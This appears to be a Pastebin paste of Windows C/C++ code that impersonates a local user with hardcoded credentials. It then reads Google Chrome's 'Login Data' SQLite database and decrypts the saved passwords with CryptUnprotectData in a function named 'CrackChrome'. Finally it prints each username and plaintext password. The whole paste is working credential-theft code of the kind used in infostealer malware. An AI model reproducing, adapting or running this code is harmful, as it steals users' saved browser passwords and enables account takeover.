Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <stdio.h>
- #include <conio.h>
- #include <Sddl.h>
- #include <sqlite3.h>
- #pragma comment(lib, "sqlite3.lib")
- #pragma comment(lib, "crypt32.lib")
- char *CrackChrome(BYTE *data, int bSize){
- DATA_BLOB in;
- DATA_BLOB out;
- in.pbData = data;
- in.cbData = bSize + 1;//we can't use strlen on a byte pointer,becouse of the NBs,so we have to be tricky dicky:)
- char *str = new char[bSize + 1];
- ZeroMemory(str, bSize + 1);
- if (CryptUnprotectData(&in, NULL, NULL, NULL, NULL, 0, &out)){
- for (DWORD i = 0; i < out.cbData; i++)
- str[i] = out.pbData[i];
- str[out.cbData] = '\0';
- return str;
- }
- else{
- return NULL; //Error on decryption
- }
- }
- void main(){
- HANDLE token;
- if (OpenProcessToken(GetCurrentProcess(),
- TOKEN_DUPLICATE |
- TOKEN_QUERY |
- TOKEN_IMPERSONATE
- , &token)){
- printf("Process token opened!\n");
- if (LogonUserA("MARkus", ".", "MARCUS", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &token)){
- printf("Logon complete!\n");
- }
- else
- printf("%d\n", GetLastError());
- if (ImpersonateLoggedOnUser(token)){
- printf("Impersonation complete!\n");
- //we need 2 calls To GetTokenInformation:
- //1.To get the buffer size,so we know how much data to allocate
- //2.The actual call
- // Call GetTokenInformation to get the buffer size.
- PTOKEN_USER ptu = NULL;
- DWORD dwSize = 0;
- if (!GetTokenInformation(token, TokenUser, NULL, 0, &dwSize)
- && ERROR_INSUFFICIENT_BUFFER != GetLastError())
- {
- printf("Error!\n");
- }
- if (NULL != (ptu = (PTOKEN_USER)LocalAlloc(LPTR, dwSize)))
- {
- LPTSTR StringSid = NULL;
- if (!GetTokenInformation(token, TokenUser, ptu, dwSize, &dwSize))
- {
- LocalFree((HLOCAL)ptu);
- printf("Error2!\n");
- }
- if (ConvertSidToStringSid(ptu->User.Sid, &StringSid))
- {
- char *name = NULL;
- LPTSTR DomainName = NULL;
- DWORD length = 1, dwDomainName = 1;
- SID_NAME_USE nuse = SidTypeUnknown;
- BOOL b = LookupAccountSid(
- NULL, // local computer
- ptu->User.Sid,
- name,
- (LPDWORD)&length,
- DomainName,
- (LPDWORD)&dwDomainName,
- &nuse);
- // Reallocate memory for the buffers.
- name = (LPTSTR)GlobalAlloc(
- GMEM_FIXED,
- length);
- DomainName = (LPTSTR)GlobalAlloc(
- GMEM_FIXED,
- dwDomainName);
- b = LookupAccountSid(
- NULL, // name of local or remote computer
- ptu->User.Sid, // security identifier
- name, // account name buffer
- (LPDWORD)&length, // size of account name buffer
- DomainName, // domain name
- (LPDWORD)&dwDomainName, // size of domain name buffer
- &nuse); // SID type
- if (b){
- printf("Everything is OK!\n");
- printf("Username: %s\n", name);
- }
- printf("%s\n", StringSid);
- LocalFree((HLOCAL)StringSid);
- LocalFree((HLOCAL)ptu);
- }
- }
- }
- }
- sqlite3 *db;
- sqlite3_stmt *stmt;
- char *query = "SELECT origin_url, username_value, password_value FROM logins";
- char *tempPath = "C:\\Users\\MARkus\\AppData\\Local\\Google\\Chrome\\User data\\Default\\Login Data";
- //Open the database
- if (sqlite3_open(tempPath, &db) == SQLITE_OK) {
- //delete[]tempPath;
- if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
- //Lets begin reading data
- int entries = 0;
- while (sqlite3_step(stmt) == SQLITE_ROW) {
- //While we still have data in database
- char *url = (char *)sqlite3_column_text(stmt, 0);
- char *username = (char *)sqlite3_column_text(stmt, 1);
- BYTE *password = (BYTE *)sqlite3_column_blob(stmt, 2); //This is the only encrypted field
- int bSize = sqlite3_column_bytes(stmt, 2);
- printf("User: %s\n", username);
- char *decrypted = CrackChrome(password, bSize);
- if (decrypted){
- printf("Password: %s\n", decrypted);
- }
- else
- printf("Error decrypting password!\n");
- entries++;
- }
- if (entries == 0){
- ;// printf("No entries found!\n");
- }
- }
- else
- ;//printf("Error preparing database!\n");
- sqlite3_finalize(stmt);
- sqlite3_close(db);
- }
- _getch();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
